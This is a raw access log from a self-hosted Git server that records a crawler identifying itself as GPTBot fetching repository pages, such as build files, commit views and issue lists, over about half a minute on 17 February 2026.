"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:17:11:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 72040] [Gzip 33.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:17:11:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 72039] [Gzip 33.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:17:11:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 72043] [Gzip 33.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:17:11:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 72041] [Gzip 33.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:17:11:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 72040] [Gzip 33.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:17:11:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 72039] [Gzip 33.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:17:11:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 72041] [Gzip 33.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:17:11:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 28704] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:17:11:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 28704] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:17:11:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 28704] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:17:11:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 28704] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:17:11:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 28704] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:17:11:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 28704] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:17:11:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 28704] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:17:11:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/index.tsx?display=rendered" [Client 74.7.227.38] [Length 11084] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/index.tsx" +[17/Feb/2026:17:11:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fCMakeLists.txt" [Client 74.7.227.38] [Length 25603] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:17:11:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/index.html" [Client 74.7.227.38] [Length 11102] [Gzip 4.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/index.html" +[17/Feb/2026:17:11:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 9966] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls" +[17/Feb/2026:17:11:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3.12?display=source" [Client 74.7.227.38] [Length 11089] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3.12" +[17/Feb/2026:17:11:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3.12?display=source" [Client 74.7.227.38] [Length 11059] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3.12" +[17/Feb/2026:17:11:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_VeryGood.py?display=rendered" [Client 74.7.227.38] [Length 11139] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_VeryGood.py" +[17/Feb/2026:17:11:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/js/script.js?display=source" [Client 74.7.227.38] [Length 14105] [Gzip 4.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/js/script.js" +[17/Feb/2026:17:11:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/watchdog_final_debug.spec" [Client 74.7.227.38] [Length 9863] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final_debug.spec" +[17/Feb/2026:17:11:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11103] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:17:11:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcConnectionTest/obj/project.assets.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/project.assets.json" +[17/Feb/2026:17:11:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcConnectionTest/obj/project.assets.json" +[17/Feb/2026:17:11:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10148] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues" +[17/Feb/2026:17:11:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/performance_comparison.py?display=source" [Client 74.7.227.38] [Length 17017] [Gzip 5.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/performance_comparison.py" +[17/Feb/2026:17:11:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 11860] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old" +[17/Feb/2026:17:11:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 11857] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old" +[17/Feb/2026:17:11:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 11856] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old" +[17/Feb/2026:17:11:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10981] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:17:11:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11692] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:17:11:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fcpp%2fsrc%2fcontroller.cpp" [Client 74.7.227.38] [Length 26220] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/controller.cpp" +[17/Feb/2026:17:11:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?files=C%2b%2bProject%2findustrial-comm%2fcpp%2finclude%2ftransport.hpp" [Client 74.7.227.38] [Length 19893] [Gzip 4.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/transport.hpp" +[17/Feb/2026:17:11:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fcpp%2finclude%2flogger.hpp" [Client 74.7.227.38] [Length 25172] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:17:11:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?files=C%2b%2bProject%2findustrial-comm%2fcpp%2fsrc%2fcontroller.cpp" [Client 74.7.227.38] [Length 26930] [Gzip 7.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/controller.cpp" +[17/Feb/2026:17:11:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 13531] [Gzip 5.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" +[17/Feb/2026:17:11:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 12720] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" +[17/Feb/2026:17:11:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 9988] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:17:11:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 9988] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:17:11:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 9988] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:17:11:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 552] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:17:11:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 552] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:17:11:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 552] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:17:11:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11119] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:17:11:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14658] [Gzip 5.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:17:11:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10149] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues" +[17/Feb/2026:17:11:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom2.png?display=rendered" [Client 74.7.227.38] [Length 10900] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom2.png" +[17/Feb/2026:17:11:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom6.png?display=rendered" [Client 74.7.227.38] [Length 10901] [Gzip 